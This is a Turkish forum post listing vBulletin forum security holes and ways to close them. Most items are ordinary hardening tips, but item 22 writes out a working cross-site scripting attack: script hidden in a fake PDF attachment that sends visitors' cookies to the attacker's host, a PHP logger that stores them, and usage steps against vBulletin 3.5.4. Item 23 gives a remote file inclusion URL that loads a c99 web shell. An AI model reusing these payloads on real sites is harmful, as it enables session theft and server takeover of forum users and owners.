vBulletin Güvenlik Açıkları ve Kapama Yolları

[admin]

vBuLLetin GüvenLik AçıkLarı ve Kapama YoLLarı

--------------------------------------------------------------------------------

1. İLk olarak her zaman için forumunuzu son çıkan vbulletin sürümüne upgrade edin daha güvenlidir.
2. Herhangi bi eklentide php dosyası veya php dosyalarında editleme varsa iyice dikkat edin sonradan açık teşkil edebilir.
3. Ftp nize girin ve tüm dosyalarının chmod değerlerinin 777 olmamasına dikkat edin çünkü fso ile serverınıza girilirse hacklenmeyin adam yazma hakkı bulamaz kurtulmuş olursunuz.
4. Config.php dosyanızı mutlaka kriptolayınki herhangi bi fso ile girildiğinde sql bağlantı için kimse okuyamasın.
5. Eğer phpmyadmin kullanıyorsanız phpmyadmin adresinizin şifreli olduğundan emin olun değilse şifreleyin.
6. Admincp ve modcp klasörlerinizin ismini değiştirin vede şifreleyin o klasörleri.
7. Çok basit şifreler kullanmayın şifrelerinizde &%+/ gibi özel karekterlerin olmasına özen gösterin
8. Trojen yerseniz mutlaka hemen format atın ve tüm ftp +panel v.s şifrelerinizi değiştirin
9. Forumu kurduktan sonra mutlaka install klasörünü silin sadece install.php yi değil zaten herhangi bir işlevi olmıyan klasör komple silin ileriki zamanlarda açık teşkil etmesin.
10. Mutlaka hergün sitenizin yedeğini alın herhangi bi sorunla karşılaşırsanız yedeği geri yükleyip ufak bir zararla atlatırsınız.
11. Calender(Takvim) i silin biri oraya Hacked by ****** gibisinden bişeyler ekliyerek lamerlik yapabilir.
12. Shoutbox kullanıyorsanız mutlaka html ve images ları kapatın bunlar açık teşkil ediyorlar.
13. Eğer yedeği ftp nize yollayıp ordan bilgisayarınıza çekiyorsanız yedek aldıktan sonra mutlaka ftp nizden silin çünkü yedek alınması için klasörün chmod u 777 dir ve isteyen herkez yedeği bilgisayarına indirebilir.
14. imzada html kodlarını kapatın bu yöntemle xss veya yönlendirme yapılabilir.
15. Üye olurken mutlaka resim doğrulaması olsun eğer hostunuzdan doğan bir image sorunu varsa herhangi zorunlu bir ek bilgi ekleyinki siteniz flood saldırısına maruz kalmasın.
16. Herhangi bi konuda TIKLA gibisinden yazılara direk tıklamayın önce sağ tıklayıp özelliklerden linke bakın ondan sonra tıklayın.
17. Özel mesajlarda çok özelliğin açık olmasına gerek yok cookieslerinizin güvenliği açısından özel mesajdaki özellikleri kapatın image v.s
18. Yeni kullanıcı grup eklerken bu uye grubu halka acık olsunmu seçeneğini mutlaka hayır yapın diğer kullanıcılar bu grubu seçemesin.
19. Eğer null sürüm kullanıyorsanız dosyalara dikkat edin null iken kişi sizin bilgilerinize ulaşmak için açık kapı bırakmış olabilir ör: 3.5.3 sürümündeki sm-check.php dosyası.
20. eğer topx kullanıyor kullanıyorsanız yönlendirme yemediğinden emin olun herhangi biri indexine yönlendirebilir. Örneğin burdaki kod o yüzden eğer topx iniz yönlendirme yiyosa yönlendirme kodundaki kelimeleri sansürleyin vede en garanti yol olarak açıksız topx ler var onu kullanın
21. Eğer toplistinizi eklenti olarak kullanıyosanız html kodlarının kapalı olmasına dikkat edin çünkü yönlendirme koduyla indexe yönlendirilebilir.
22. Gelelim eklentiden doğan xss açığına Notepad ile yeni bir dosya açıp aşağıdaki kodu içine yapıştırın ve testmagic.pdf olarak kaydedin.
    
    
    
    
    PHP- Kodu:

     d o c u m e n t.write('<img src="http://host adresiniz/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
document.********.href="https://www.google.com/adsense/testmagic.pdf"; 
</script> 

    Aşağıdakini de c.php olarak kaydedip bir host a atın.
    
    
    
    PHP- Kodu:

     <?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$date=date("m/d/Y g:i:s a"); 
$referer= getenv ('HTTP_REFERER'); 
$fl = fopen('megalog.txt', 'a'); 
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
fclose($fl); 
?>
    Nasıl kullanılacağına geçelim :
    
    vbulletin 3.5.4 kullanan bir foruma üye olup mesajımızı yazıyoruz. daha sonra yazdığımız mesaja testmagic.pdf i ekliyoruz. eğer o sitede açık varsa mesajı gören kullanıcıların cookie si hostunuzdaki log.txt e kaydedilecek.
    
    Kodlardaki bazı adresler yerine biliyorsunuz ki kendi adreslerinizi yazacaksınız.Bu açık sadece IE kullananlarda geçerlidir.
    
    işte eklentiden doğan xss açığı böyle kapatmak için pdf türü eklentiyi silmelisiniz.
23. Diğer vbulletin toplist açığıda şöyle
    PHP- Kodu:

    [url="http://www.hedefsite.com/toplist/sources/join.php?FORM"]http://www.hedefsite.com/toplist/sources/join.php?FORMhttp://=owned&CONFIG[captcha]=1&...rk.org/c99.txt? 

    bu şekilde biri sitenize fso ile uzaktan bağlantı kurabilir bunun için join.php deki
    PHP- Kodu:

    FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path] 

    kodunu silmeniz gerekmektedir.